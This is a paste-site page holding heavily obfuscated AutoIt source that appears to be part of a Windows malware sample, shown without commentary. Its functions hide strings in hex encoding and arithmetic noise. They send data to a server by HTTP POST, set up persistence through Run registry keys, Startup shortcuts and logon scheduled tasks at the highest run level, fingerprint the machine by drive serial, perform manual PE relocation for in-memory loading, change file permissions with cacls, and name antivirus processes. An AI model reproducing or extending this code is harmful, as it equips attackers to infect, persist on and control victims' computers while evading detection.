- Func rpauaspgbfiugfmcqguoytjnnguyvsdmdvuazorvetjk()
- Local $ti0r4rg0xqwxqpuigpe8hd
- $ti0r4rg0xqwxqpuigpe8hd = '" /E /C /G "'
- Return $ti0r4rg0xqwxqpuigpe8hd
- EndFunc
- Func ncmavsrbuwkj_dcsclb_cbs()
- Return "HKEY_LOCAL_MACHINE"
- EndFunc
- Func azcwrttikodsdhmtosilqrhymexeujembbbutt($wberil45yllmiey1iokfjbehvcygbcitleksw, $kbiqevjzu53pnfd6e208ei9sh, $5t20236socwo0js5jachogkl)
- Local $o5mmkkdwijh8occgxyb0uqpfrl = ObjCreate("WinHT" & BinaryToString("0x54502E57696E4854545052", (((0 + StringLen("d")) + 0) + 0)) & "equest.5." & "1")
- If @error Then Return SetError(((Int(ChrW("49")) - 2) + 0), @error, False)
- $o5mmkkdwijh8occgxyb0uqpfrl.open("PO" & "S" & "T", $wberil45yllmiey1iokfjbehvcygbcitleksw, False)
- $o5mmkkdwijh8occgxyb0uqpfrl.setrequestheader(iualvpsgxxxmczelpvwhhblqmrotgxagf(), $5t20236socwo0js5jachogkl)
- $o5mmkkdwijh8occgxyb0uqpfrl.setrequestheader(BinaryToString("0x436f6e74656e742d54797065", Int(Chr("49"))), BinaryToString("0x6170706C69636174696F6E" & "2F782D" & "7777772D66" & "6F726D2D75726C656E636F64656" & "4", 1))
- $o5mmkkdwijh8occgxyb0uqpfrl.setrequestheader(BinaryToString("0x436F6E74656E742D4C656E677468"), StringLen($kbiqevjzu53pnfd6e208ei9sh))
- $o5mmkkdwijh8occgxyb0uqpfrl.send($kbiqevjzu53pnfd6e208ei9sh)
- If @error OR $wpqhjjzjyuehnra <> 0 Then
- $wpqhjjzjyuehnra = 0
- Return SetError((Dec("1", 0) * (4 / -2)), @error, False)
- EndIf
- Local $wfexj4z8i3b0udx0zcchcsdvggv1j6py0z1scdjwvrbdvdlby = $o5mmkkdwijh8occgxyb0uqpfrl.status
- If $wfexj4z8i3b0udx0zcchcsdvggv1j6py0z1scdjwvrbdvdlby = 200 Then
- Return BinaryToString($o5mmkkdwijh8occgxyb0uqpfrl.responsebody)
- Else
- Return SetError(((Int(Chr(49)) * 3) + -6), $wfexj4z8i3b0udx0zcchcsdvggv1j6py0z1scdjwvrbdvdlby, False)
- EndIf
- EndFunc
- Func konyqusqkq_qcty_hkpqnpqbzfvzlcxze_nwm()
- Return "\"
- EndFunc
- Func omubxoacpbjouqbwuxbryxqhllqtgz_epoflhzfebdbo()
- Return "Stri"
- EndFunc
- Func gsvrgilpirrqddrbznmaewwoxdhudqe()
- Local $ikiano6ccdeg
- $ikiano6ccdeg = "S-1-"
- Return $ikiano6ccdeg
- EndFunc
- Func hins_xsbpamdjm()
- Local $phklrgbwmndk22mew8eo6wa4hd9gpgkp4ygk0
- $phklrgbwmndk22mew8eo6wa4hd9gpgkp4ygk0 = "0x64776f726420636253697a653b7074722052657365727665643b707472204465736b746f703b707472205469746c653b64776f726420583b64776f726420593b64776f7264205853697a653b64776f7264205953697a653b64776f72642058436f756e7443686172733b64776f72642059436f756e7443686172733b64776f72642046696c6c4174747269627574653b64776f726420466c6167733b776f72642053686f7757696e646f773b776f7264205265736572766564323b707472205265736572766564323b7074722068537464496e7075743b70747220685374644f75747075743b70747220685374644572726f72"
- Return $phklrgbwmndk22mew8eo6wa4hd9gpgkp4ygk0
- EndFunc
- Func kwunbssfrdmowoetvphkavhjsyiuxsapmapqcbbrxvqcsnb()
- Local $4b4hfb3jwbkjihgeoupdpjj6cgc4ccechxupbxgz8
- $4b4hfb3jwbkjihgeoupdpjj6cgc4ccechxupbxgz8 = BinaryToString(napcxlnzritfccozuamlxc_pofjkghdknxvhi(), 1)
- Return $4b4hfb3jwbkjihgeoupdpjj6cgc4ccechxupbxgz8
- EndFunc
- Func hzey_ahlkhvhemrscd_fl()
- Local $2485nlw5kpiwq3zz4zaijv6m
- $2485nlw5kpiwq3zz4zaijv6m = ":Zone.I" & "dent" & "ifi" & "e" & "r"
- Return $2485nlw5kpiwq3zz4zaijv6m
- EndFunc
- Func wdeersmqmeia($2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
- Local $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm
- If @OSArch <> wlptpdgymhaqwbxheuoc_slmujgoyzefk() Then $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm = "6" & "4"
- If IsAdmin() = True Then
- If RegRead(ncmavsrbuwkj_dcsclb_cbs() & $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm & "\Software" & "\Microsoft\W" & "indows\Curre" & "ntVersion\Run\", $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then RegDelete(BinaryToString("0X" & "4" & "84B45595F4C" & "4F43414C5F4D41" & "4348494E" & "45") & $yzmyygdrwjgpbi0w4y8oodggkrqdxlr5mzm & lhkdyhqgsnwgdzpdzsztrsglapgjcayfbpoe(), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
- If RegRead(BinaryToString("0X484B45595F43555252454E545F555345525C536F6674776172" & "655C4D696" & "3726F736F66745C57696E646F77735C43757272" & "656E7456657273696F6E5C52756E5C", (0 + (-1 / (-1 / 1)))), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then RegDelete(gcqvwlgabthmqyetwucla_gcivspmsnulr(), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
- Local $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = Run(jydoxbdsboalqta(), "", @SW_HIDE, 2)
- ProcessWaitClose($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8, StringLen("7Bu5KtqUix"))
- If NOT @error Then
- Local $0anfbfiacxx = StdoutRead($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8)
- If StringInStr($0anfbfiacxx, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then
- Run(BinaryToString("0X7363687461736b73", Int(ChrW("49"))) & " /" & zkkurjoliostulnpoaidhrzkdsrfpbertxc() & BinaryToString("0X6c657465") & " /TN " & Chr("3" & "4") & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & Chr("3" & "4") & rshhjjzjoqnrfvikbddmfoeyxfjzcbpobhgorsqhrv(), "", @SW_HIDE)
- EndIf
- EndIf
- If FileExists(@StartupCommonDir & BinaryToString("0x5C", 1) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & bictenbxhtjgwsjpjtlz()) Then FileDelete(@StartupCommonDir & BinaryToString("0" & "x" & "5C", StringLen("s")) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & "." & "l" & "n" & "k")
- Else
- If RegRead(BinaryToString(BinaryToString("0x3078343834423435353935463433353535323532343534453534354635353533343535323543353336463636373437373631373236353543344436393633373" & "2364637333646363637343543353736393645363436463737373335433433373537323732363536453734353636353732373336393646" & "364535433532373536453543")), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then RegDelete(reffgukbceidox(), $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
- If FileExists(@StartupDir & BinaryToString("0" & "X5" & "c", Int(Chr(49))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & "." & "l" & "n" & "k") Then FileDelete(@StartupDir & wxbudxwwclnkwbnp() & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & xxstmhlpmbibgvemtxxswdorzdhaqgglqohwhuhoabvzwf())
- EndIf
- EndFunc
- Func qhdcazedjxsqolohpguzcltkoait()
- Local $v7rqynzzc8q6awsffaxzz3spexouzpq7xfiujwz = "Rcx"
- Return $v7rqynzzc8q6awsffaxzz3spexouzpq7xfiujwz
- EndFunc
- Func ztqerabqikbldjzkht()
- Return mzecyhabmcizyfxvlourcffcdcbruycdwb(StringToBinary(DriveGetType(@HomeDrive & BinaryToString("0x" & "5" & "C", Int(Chr(49)))) & DriveSpaceTotal(@HomeDrive & ppmcdosepfdovocapnawwmitxeolhobtjphdjznqbrrrbi()) & DriveGetSerial(@HomeDrive & BinaryToString(ulcjgcxrffja_ogbqabrjwmegnxnvrbqb()))))
- EndFunc
- Func bkmjbpjydgpjezru($n4c3hqn4eib0zrsardsumi3, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8)
- If NOT IsAdmin() Then Return SetError((Dec("1", 0) / -1), -StringLen("I"), False)
- Local $7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8 = Run(BinaryToString("0X7363687461736B73202F5175657279"), "", @SW_HIDE, 2)
- ProcessWaitClose($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8, (-20 / ((StringLen("9sws") / -1) / (2 + 0))))
- If NOT @error Then
- Local $0anfbfiacxx = StdoutRead($7jblt9vbsmh5fnicy23uesjddjj4grhr0nolaukhep4ldfa8)
- If NOT StringInStr($0anfbfiacxx, $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8) Then
- If @OSVersion = cpttzgulsesxriwhs() OR @OSVersion = BinaryToString("0X57494e5f585065") Then
- Run("schtasks " & "/Create /SC ON" & "LOGON /TN " & Chr(BinaryToString(BinaryToString("0X305833333334", Int(Chr(49))))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & Chr(BinaryToString("0x3334", 1)) & samxpookfiehurh() & Chr("3" & "4") & $n4c3hqn4eib0zrsardsumi3 & Chr("3" & "4"), "", @SW_HIDE)
- Else
- Run(BinaryToString("0X7363687461736b73202f4372656174" & "65202f534320" & "4f" & "4e4c4f474f" & "4e202f544e" & "20", (-1 - (-1 - 1))) & Chr(BinaryToString("0x3334", (0 + Int(Chr("49"))))) & $2lrdcsztvcc23mr6gjzichzpcpkrvps519hj8hwxpunai7b8 & Chr("3" & "4") & " /RL" & " HI" & BinaryToString("0x4748455354202F5452") & " " & Chr(BinaryToString("0X3334", Dec("1", 0))) & $n4c3hqn4eib0zrsardsumi3 & Chr(ubajtsbgaahkkcrdi()), "", @SW_HIDE)
- EndIf
- EndIf
- EndIf
- Return SetError(0, 0, True)
- EndFunc
- Func ndxipyamhikphz($7rreuxn1kzllf8ickhwzibom9xvbzf)
- If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, "[") AND StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, "]") Then
- If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, "," & " ") Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringReplace($7rreuxn1kzllf8ickhwzibom9xvbzf, "," & " ", BinaryToString(BinaryToString("0X30583263")))
- If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, BinaryToString("0x" & "2" & "2")) Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringReplace($7rreuxn1kzllf8ickhwzibom9xvbzf, '"', "")
- If StringLeft($7rreuxn1kzllf8ickhwzibom9xvbzf, (0 - (0 + (-1 / Dec("1"))))) = "[" Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringTrimLeft($7rreuxn1kzllf8ickhwzibom9xvbzf, Int(ChrW(49)))
- If StringRight($7rreuxn1kzllf8ickhwzibom9xvbzf, Int(Chr("49"))) = BinaryToString(BinaryToString("0X30783544", (-1 + Dec("2", 0))), Dec("1", 0)) Then $7rreuxn1kzllf8ickhwzibom9xvbzf = StringTrimRight($7rreuxn1kzllf8ickhwzibom9xvbzf, ((0 + ((((0 + -1) / ((-1 + 0) - -2)) / 1) - 0)) / (Dec("1", 0) + (2 / -1))))
- If StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, cweespicvbksldpwwugjuchdstxolpsea()) Then
- Local $4gkzstnhi3gu[1], $b6bkqk71flhjou63, $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o, $fz3eclo13c4hpsztvduuwn10gcs, $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym
- $b6bkqk71flhjou63 = StringSplit($7rreuxn1kzllf8ickhwzibom9xvbzf, "," & "[", ((1 / (0 + (-1 + 2))) / (0 - (-1 - 0))))
- $4gkzstnhi3gu[0] = 0
- For $fz3eclo13c4hpsztvduuwn10gcs = 1 To $b6bkqk71flhjou63[0]
- If StringRight($b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs], 1) = kexnnlbgfablhpkcziweggosbkcp() Then
- $b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs] = StringTrimRight($b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs], (0 + 1))
- $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o = StringSplit($b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs], BinaryToString("0x2c"))
- If UBound($4gkzstnhi3gu, 2) < UBound($foqtequiqk5kmj21igcviqglje7jn21nlidrps8o) Then
- $4gkzstnhi3gu = ljcqynralzwqjf($4gkzstnhi3gu, UBound($4gkzstnhi3gu) + 1, UBound($foqtequiqk5kmj21igcviqglje7jn21nlidrps8o) - 1)
- Else
- ReDim $4gkzstnhi3gu[UBound($4gkzstnhi3gu) + Int(ChrW("49"))][UBound($4gkzstnhi3gu, 2)]
- EndIf
- For $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym = Int(Chr("49")) To $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o[0]
- $4gkzstnhi3gu[UBound($4gkzstnhi3gu) - (1 / StringLen("h"))][$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym - StringLen("h")] = $foqtequiqk5kmj21igcviqglje7jn21nlidrps8o[$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym]
- Next
- If UBound($4gkzstnhi3gu, Dec("2")) > 0 Then
- $4gkzstnhi3gu[0][0] += ((1 - 0) + 0)
- Else
- $4gkzstnhi3gu[0] += StringLen("7")
- EndIf
- Else
- If UBound($4gkzstnhi3gu, Int(Chr(50))) > 0 Then
- ReDim $4gkzstnhi3gu[UBound($4gkzstnhi3gu) + Dec("1")][UBound($4gkzstnhi3gu, 2)]
- Else
- ReDim $4gkzstnhi3gu[UBound($4gkzstnhi3gu) + Int(ChrW("49"))]
- EndIf
- $4gkzstnhi3gu[UBound($4gkzstnhi3gu) - 1] = $b6bkqk71flhjou63[$fz3eclo13c4hpsztvduuwn10gcs]
- If UBound($4gkzstnhi3gu, Int(Chr("50"))) > 0 Then
- $4gkzstnhi3gu[0][0] += 1
- Else
- $4gkzstnhi3gu[0] += Dec("1", 0)
- EndIf
- EndIf
- Next
- Else
- Local $4gkzstnhi3gu[((1 + (2 / -1)) - (3 / -1))] = [1, $7rreuxn1kzllf8ickhwzibom9xvbzf]
- EndIf
- ElseIf StringInStr($7rreuxn1kzllf8ickhwzibom9xvbzf, '"') Then
- $7rreuxn1kzllf8ickhwzibom9xvbzf = StringReplace($7rreuxn1kzllf8ickhwzibom9xvbzf, '"', "")
- Local $4gkzstnhi3gu[(Dec("1") * 2)] = [1, $7rreuxn1kzllf8ickhwzibom9xvbzf]
- ElseIf StringIsDigit($7rreuxn1kzllf8ickhwzibom9xvbzf) Then
- Local $4gkzstnhi3gu[Dec("2")] = [Int(Chr(49)), $7rreuxn1kzllf8ickhwzibom9xvbzf]
- Else
- Return SetError(-1, -1, False)
- EndIf
- Return $4gkzstnhi3gu
- EndFunc
- Func buvlnkhyhokev()
- Local $oza8dkxfduzx9cp
- $oza8dkxfduzx9cp = "0x22"
- Return $oza8dkxfduzx9cp
- EndFunc
- Func majopsiftujeynku()
- Return BinaryToString("0X5C536865" & "6C6C3" & "332" & "2" & "E646C6C")
- EndFunc
- Func mq_ttlrxgpmqogskxroyqvwm_bdzggb()
- Return "X64"
- EndFunc
- Func gcqvwlgabthmqyetwucla_gcivspmsnulr()
- Local $vhhb6k4aaee1gz5hpzyoolfgk84a = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"
- Return $vhhb6k4aaee1gz5hpzyoolfgk84a
- EndFunc
- Func fwhnpcoougjxlddfjoznzqtqlbwctprdsdvaud()
- Local $kmbliemxztalyld2wpyunfcolm9vnkdaayt9upu = '"'
- Return $kmbliemxztalyld2wpyunfcolm9vnkdaayt9upu
- EndFunc
- Func rdptebhehksbnzvuts_aeodaoryyyztuzrcmjlkhlddlycey()
- Return "0x3d"
- EndFunc
- Func jpdaayhe_iogzmlxfn_($p9fqygetfjzkktahkwmjbkxxndbbj6gey)
- Local $sdrcpsdjp8oa5pcmojsu9ct1ey, $ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5, $m1xwaizecme0vhmm0am2ylwg
- If IsString($p9fqygetfjzkktahkwmjbkxxndbbj6gey) Then
- $sdrcpsdjp8oa5pcmojsu9ct1ey = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $p9fqygetfjzkktahkwmjbkxxndbbj6gey, "ptr*", 0)
- If @error OR NOT $sdrcpsdjp8oa5pcmojsu9ct1ey[0] Then Return SetError(1, @extended, 0)
- $p9fqygetfjzkktahkwmjbkxxndbbj6gey = $sdrcpsdjp8oa5pcmojsu9ct1ey[(((-12 / -3) / (0 - 1)) / (1 * (1 + -3)))]
- $sdrcpsdjp8oa5pcmojsu9ct1ey = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $p9fqygetfjzkktahkwmjbkxxndbbj6gey)
- If @error Then Return SetError(((-4 / 2) + ((4 * 4) / 4)), @extended, 0)
- $ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5 = DllStructCreate(ncsv_axwhwanqqdyepezikkiinqlpqmecxpbufbt() & $sdrcpsdjp8oa5pcmojsu9ct1ey[0] & supduuqtf_m_qp(), $p9fqygetfjzkktahkwmjbkxxndbbj6gey)
- $m1xwaizecme0vhmm0am2ylwg = DllStructCreate("byte" & " Data" & "[" & DllStructGetSize($ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5) & BinaryToString(BinaryToString("0" & "X" & "3058" & "3564"), Int(Chr("49"))))
- DllStructSetData($m1xwaizecme0vhmm0am2ylwg, qlgskympacaenl_h(), DllStructGetData($ac6ufpqh3ehmsrzzgts9mulc0avmgbbkj7jwrian8bx37nyv5, qyhpgtxpkraadh()))
- DllCall("kernel32.dll", "handle", "LocalFree", "handle", $p9fqygetfjzkktahkwmjbkxxndbbj6gey)
- If @error Then Return SetError(StringLen("Q2O"), @extended, 0)
- $p9fqygetfjzkktahkwmjbkxxndbbj6gey = $m1xwaizecme0vhmm0am2ylwg
- EndIf
- $sdrcpsdjp8oa5pcmojsu9ct1ey = DllCall("advapi32.dll", "bool", "LookupAccountSidW", "ptr", "", "struct*", $p9fqygetfjzkktahkwmjbkxxndbbj6gey, "wstr", "", "dword*", 65536, "wstr", "", "dword*", ((-8657 + -3842) - (-25425 + -52610)), "int*", 0)
- If @error OR NOT $sdrcpsdjp8oa5pcmojsu9ct1ey[0] Then Return SetError((((4 / ((StringLen("jC") + -4) + 0)) - (-4 / 1)) + (1 * Dec("2"))), @extended, 0)
- Return $sdrcpsdjp8oa5pcmojsu9ct1ey[((3 - 12) / (((1 / (((1 / (-1 - 0)) + 0) / 1)) - 0) - Dec("2", 0)))]
- EndFunc
- Func xsguetdejifnxhci_f()
- Local $azgdbwjkjldnxnglz = BinaryToString("0x532D312D352D33322D353435")
- Return $azgdbwjkjldnxnglz
- EndFunc
- Func ljcqynralzwqjf($wxermiwowhsasf9mtbmpt, $qcwyj5fmwo5m9g8nisvlpqb1jnl2svlrfh, $ya1rlwhpvq1)
- Local $4gkzstnhi3gu[$qcwyj5fmwo5m9g8nisvlpqb1jnl2svlrfh][$ya1rlwhpvq1], $fz3eclo13c4hpsztvduuwn10gcs, $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym
- If UBound($wxermiwowhsasf9mtbmpt, 2) > 0 Then
- For $fz3eclo13c4hpsztvduuwn10gcs = 0 To UBound($wxermiwowhsasf9mtbmpt) - (0 - -1)
- For $ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym = 0 To UBound($wxermiwowhsasf9mtbmpt, Int(ChrW("50"))) - 1
- $4gkzstnhi3gu[$fz3eclo13c4hpsztvduuwn10gcs][$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym] = $wxermiwowhsasf9mtbmpt[$fz3eclo13c4hpsztvduuwn10gcs][$ufs0phxs6t3grguoodzcpv6yq54wqmjvsnyut7qmdbsnym]
- Next
- Next
- Else
- For $fz3eclo13c4hpsztvduuwn10gcs = 0 To UBound($wxermiwowhsasf9mtbmpt) - (((0 + -1) / Int(ChrW(49))) - (-2 + 0))
- $4gkzstnhi3gu[$fz3eclo13c4hpsztvduuwn10gcs][0] = $wxermiwowhsasf9mtbmpt[$fz3eclo13c4hpsztvduuwn10gcs]
- Next
- EndIf
- Return $4gkzstnhi3gu
- EndFunc
- Func sbenvtjps_llhlvtw()
- Return "0x30783438346234353539356634633466343334313463356634643431343334383439346534353563353334663436353435373431353234353563346436393633373236663733366636363734356335373639366536343666373737333230346535343563343337353732373236353665373435363635373237333639366636653563353037323666363636393663363534633639373337343563"
- EndFunc
- Func emkwvmcvdwchvlggjh()
- Return "updaterui.exe"
- EndFunc
- Func wxbudxwwclnkwbnp()
- Return "\"
- EndFunc
- Func nhmtqsdhdgeimlif()
- Local $uyupnwilw8i93iyfe4jroji3rm8 = "as" & "hServ" & ".exe"
- Return $uyupnwilw8i93iyfe4jroji3rm8
- EndFunc
- Func _zauoysuzmlereeujfkwlvy()
- Local $pebknglp5tt4upzhzupzzytgtb30zbmrl24yx0j1zaw
- $pebknglp5tt4upzhzupzzytgtb30zbmrl24yx0j1zaw = zvwndffxdbesncpkyrbjbyfasim()
- Return $pebknglp5tt4upzhzupzzytgtb30zbmrl24yx0j1zaw
- EndFunc
- Func ks_tmbbcohmnojwvgvjjpboikjrqqlwoiuhfpmhibhkuupai()
- Local $dkqorlifr0uk5t
- $dkqorlifr0uk5t = "0x49413634"
- Return $dkqorlifr0uk5t
- EndFunc
- Func ejltrmxaafxmoufziiqvmjtahjkcqjdzj_yg_jsvmbtdzaipj()
- Return '"'
- EndFunc
- Func ubajtsbgaahkkcrdi()
- Return BinaryToString("0X3334")
- EndFunc
- Func sdzvmsjsjepebalxyzamymrnjpzltpexiivwmoji()
- Return "0x5369676E6174757265"
- EndFunc
- Func wlptpdgymhaqwbxheuoc_slmujgoyzefk()
- Local $nrnacbxvchqh = BinaryToString(lyqvgdzzpplfyyezogknumhmdcpindeauspqhil(), 1)
- Return $nrnacbxvchqh
- EndFunc
- Func rzwyukcynnwzcpeuvhaibwylv_dwcpeuz()
- Local $c087dm8umqbqal9rbqip71z1a1xzxi0jif4 = BinaryToString(fyhtcqknnvyqupj_cgxhowajmf())
- Return $c087dm8umqbqal9rbqip71z1a1xzxi0jif4
- EndFunc
- Func sfzl_onbyjsysrkquujnmoxne_apoyk_blhyjitmg_wpu($xdl1fupjkev5krgwcnqdylzcolqcweuhcx5, $nr1qodybzsvkbrteei0g66pv, $naei84ejazwv72cuffvz7ddjjevoalr, $lrcqa6nltol, $cmnasi8pxhnoaau6rjtayo)
- Local $grvxlhvk0axgbl1xfaxpe28wz = $naei84ejazwv72cuffvz7ddjjevoalr - $lrcqa6nltol
- Local $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul = DllStructGetSize($nr1qodybzsvkbrteei0g66pv)
- Local $vgcbb26bdutogbnp = DllStructGetPtr($nr1qodybzsvkbrteei0g66pv)
- Local $7qmvohrm6jc9s, $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj
- Local $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf, $jtwdxgbx5nmhwxn7tybjepiv8taesou, $vzwegjsslwnszv6e
- Local $lpkm1h3hiqbffod2npqxnmdz8engomm, $fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu, $xnqmjajbcib
- Local $twmpripm79sl = Int(ChrW("51")) + 7 * $cmnasi8pxhnoaau6rjtayo
- While $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj < $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul
- $7qmvohrm6jc9s = DllStructCreate(_zauoysuzmlereeujfkwlvy(), $vgcbb26bdutogbnp + $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj)
- $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf = DllStructGetData($7qmvohrm6jc9s, "V" & "i" & "r" & "t" & "u" & "a" & "l" & "Address")
- $jtwdxgbx5nmhwxn7tybjepiv8taesou = DllStructGetData($7qmvohrm6jc9s, BinaryToString("0X53697a654f66426c6f636b"))
- $vzwegjsslwnszv6e = ($jtwdxgbx5nmhwxn7tybjepiv8taesou - (((6 - 21) - 17) / ((StringLen("2") + ((Dec("1") / -1) * Int(Chr("51")))) - Int(ChrW(50))))) / 2
- $lpkm1h3hiqbffod2npqxnmdz8engomm = DllStructCreate(hsuakvazknwxbunnsnqlrovmtwlwqflka() & $vzwegjsslwnszv6e & cbxstjeryqrhpoxgtbhxk_wzvgxzxr(), DllStructGetPtr($7qmvohrm6jc9s) + StringLen("RNL6Bgsf"))
- For $fz3eclo13c4hpsztvduuwn10gcs = (Int(ChrW("49")) + 0) To $vzwegjsslwnszv6e
- $fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu = DllStructGetData($lpkm1h3hiqbffod2npqxnmdz8engomm, Dec("1"), $fz3eclo13c4hpsztvduuwn10gcs)
- If BitShift($fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu, 12) = $twmpripm79sl Then
- $xnqmjajbcib = DllStructCreate("pt" & "r", $xdl1fupjkev5krgwcnqdylzcolqcweuhcx5 + $fqi2htba9xwksr0nftkygrwawwn6sazwrkheapjhf + BitAND($fqihyodlbbc335n8j2ypki8n64sqwigx6gy8qz3n6theunlu, 4095))
- DllStructSetData($xnqmjajbcib, StringLen("I"), DllStructGetData($xnqmjajbcib, 1) + $grvxlhvk0axgbl1xfaxpe28wz)
- EndIf
- Next
- $gl0yzt9tjqbppacf7d4e4hmqka7aibjvazpzsasj += $jtwdxgbx5nmhwxn7tybjepiv8taesou
- WEnd
- Return Dec("1", 0)
- EndFunc
- Func qvzvehgxhkjzwauiesstlqmfoohtexqnfxrzaudeciyqvnkiwf()
- Local $yqf8jxc25rntjmv8obncs = "0x436F6E74657874466C616773"
- Return $yqf8jxc25rntjmv8obncs
- EndFunc
- Func xnzijqdtgsqsvfznaqmcqxomjylhi()
- Return Int(IsAdmin())
- EndFunc
- Func bkmyzmqofazpp_gknotdxwesztvdldofdzwpg()
- Return ' /c cacls.exe "'
- EndFunc
- Func ja_eftkmxypsfrlzelslpstbcdvlmlwowcbk()
- Local $uwimob2kkvexex403vkvi027iydbklcg1rzqsuyapt = "avguard.exe"
- Return $uwimob2kkvexex403vkvi027iydbklcg1rzqsuyapt
- EndFunc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement